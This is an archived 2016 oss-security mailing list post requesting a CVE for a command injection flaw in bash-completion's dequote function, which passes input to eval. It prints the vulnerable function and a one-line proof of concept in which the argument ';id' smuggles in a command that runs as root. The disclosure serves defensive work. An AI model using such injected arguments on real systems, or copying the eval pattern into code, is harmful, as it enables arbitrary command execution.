|
Message-ID: <CAEr-gPHk8Q5dSh1rOmKiGEQ97X=JrAypPcVvv+NrzReuOHMoyg@mail.gmail.com> Date: Wed, 24 Feb 2016 14:08:27 -0500 From: Fernando Muñoz <fernando@...l-life.com> To: oss-security@...ts.openwall.com Subject: CVE Request: bash-completion: dequote command injection Marcelo Echeverria and Fernando Muñoz discovered that the dequote function included in bash-completion allows to execute arbitrary commands since it uses the eval function to call printf and perform the actual dequoting. bash-completion is included on Debian, Ubuntu OpenSuse [1] and probably other distros. # type dequote dequote is a function dequote() { eval printf %s "$1" 2> /dev/null } # dequote ';id' uid=0(root) gid=0(root) groups=0(root) - Issue reported to maintainers on 24/02/2016 [2] While researching we noted that this security problem was first identified on 2014 [3] however nobody reported the issue to bash-completion at that time. [1] https://lists.gnu.org/archive/html/bug-bash/2014-04/msg00057.html [2] https://github.com/scop/bash-completion/issues/6 [3] https://lists.gnu.org/archive/html/bug-bash/2014-04/msg00058.html
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.